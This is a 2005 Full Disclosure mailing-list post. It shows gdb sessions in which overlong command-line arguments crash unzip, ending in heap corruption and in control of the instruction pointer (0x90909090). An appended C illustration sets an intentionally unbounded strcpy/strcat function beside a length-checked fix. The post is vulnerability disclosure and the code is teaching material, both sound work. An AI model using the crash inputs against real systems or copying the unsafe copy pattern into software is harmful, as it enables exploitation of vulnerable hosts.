Full Disclosure mailing list archives

Unzip *ALL* versions ;))


From: c0ntex <c0ntexb () gmail com>
Date: Mon, 19 Dec 2005 12:06:07 +0000

Just to add to the pot, this little bug has been there a long time,
mmm, around 2+ yrs. Any apps calling unzip? Any unzip archives with
rather large files?

;)

[c0ntex@linuxbox tmp]$ gdb -q unzip
(no debugging symbols found)...Using host libthread_db library
"/lib/tls/libthread_db.so.1".
(gdb) r `perl -e 'print "A" x 5000'`
Starting program: /usr/bin/unzip `perl -e 'print "A" x 5000'`
Reading symbols from shared object read from target memory...(no
debugging symbols found)...done.
Loaded system supplied DSO at 0xffffe000
(no debugging symbols found)...(no debugging symbols found)...unzip: 
cannot find or open AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

[snip]

AAAAAAAAAAAAAA.ZIP.
*** glibc detected *** double free or corruption: 0x08075008 ***

Program received signal SIGABRT, Aborted.
0xffffe410 in __kernel_vsyscall ()
(gdb) bt
#0  0xffffe410 in __kernel_vsyscall ()
#1  0x002a2955 in raise () from /lib/tls/libc.so.6
#2  0x002a4319 in abort () from /lib/tls/libc.so.6
#3  0x002dba1b in malloc_printerr () from /lib/tls/libc.so.6
#4  0x002dc4ba in free () from /lib/tls/libc.so.6
#5  0x080543a6 in ?? ()
#6  0x08075008 in ?? ()
#7  0x00000005 in ?? ()
#8  0x00000000 in ?? ()
(gdb) frame 4
#4  0x002dc4ba in free () from /lib/tls/libc.so.6
(gdb) i r
eax            0x0      0
ecx            0x10b7   4279
edx            0x6      6
ebx            0x39dff4 3792884
esp            0xbfdc2194       0xbfdc2194
ebp            0xbfdc21a8       0xbfdc21a8
esi            0x39f800 3799040
edi            0x8075008        134696968
eip            0x2dc4ba 0x2dc4ba
eflags         0x200246 2097734
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) x/s $edi
0x8075008:       'A' <repeats 196 times>
(gdb) x/s $esi
0x39f800 <main_arena>:   "\001"
(gdb)
0x39f802 <main_arena+2>:         ""
(gdb)


gdb) r `python -c 'print "\x90" * 50000'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
warning: cannot close "shared object read from target memory": File in
wrong format
Starting program: /usr/bin/unzip `python -c 'print "\x90" * 50000'`
Reading symbols from shared object read from target memory...(no
debugging symbols found)...done.
Loaded system supplied DSO at 0xffffe000
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x90909090 in ?? ()
(gdb)


--

regards
c0ntex
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
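The crash above is consistent with an archive name that is copied, with the ".ZIP" suffix appended, into a fixed-size buffer that cannot hold a 5000-byte argument, so the heap metadata behind it is overwritten and glibc later aborts in free(). As an added illustration (not unzip's source, which the post does not show, and not c0ntex's code), here is that unchecked copy pattern beside a bounded form that refuses oversized names; NAME_BUF and the function names are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define NAME_BUF   256     /* hypothetical buffer size, not unzip's real value */
#define ZIP_SUFFIX ".ZIP"

/* Unsafe pattern (hypothetical reconstruction): the caller-supplied name is
 * copied into a fixed-size heap buffer and the suffix appended with no length
 * check, so an overlong argv[1] writes past the allocation and corrupts the
 * neighbouring heap chunk headers that glibc later reports as
 * "double free or corruption". Shown for contrast only; never call it. */
char *unsafe_archive_name(const char *arg)
{
    char *buf = malloc(NAME_BUF);
    if (!buf) return NULL;
    strcpy(buf, arg);               /* overflow once strlen(arg) >= NAME_BUF */
    strcat(buf, ZIP_SUFFIX);
    return buf;
}

/* Hardened form: decide up front whether name + suffix + NUL fit, and reject
 * the input instead of writing past the buffer. */
int name_fits(const char *arg, size_t limit)
{
    return strlen(arg) + strlen(ZIP_SUFFIX) + 1 <= limit;
}

char *safe_archive_name(const char *arg, size_t limit)
{
    if (!name_fits(arg, limit)) return NULL;   /* too long: refuse, don't truncate silently */
    char *buf = malloc(limit);
    if (!buf) return NULL;
    snprintf(buf, limit, "%s%s", arg, ZIP_SUFFIX);  /* bounded by limit, NUL-terminated */
    return buf;
}

int main(int argc, char **argv)
{
    const char *arg = argc > 1 ? argv[1] : "archive";
    char *name = safe_archive_name(arg, NAME_BUF);
    if (!name) {
        fprintf(stderr, "archive name too long (%zu bytes, limit %d)\n", strlen(arg), NAME_BUF);
        return 1;
    }
    printf("opening %s\n", name);
    free(name);
    return 0;
}
```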

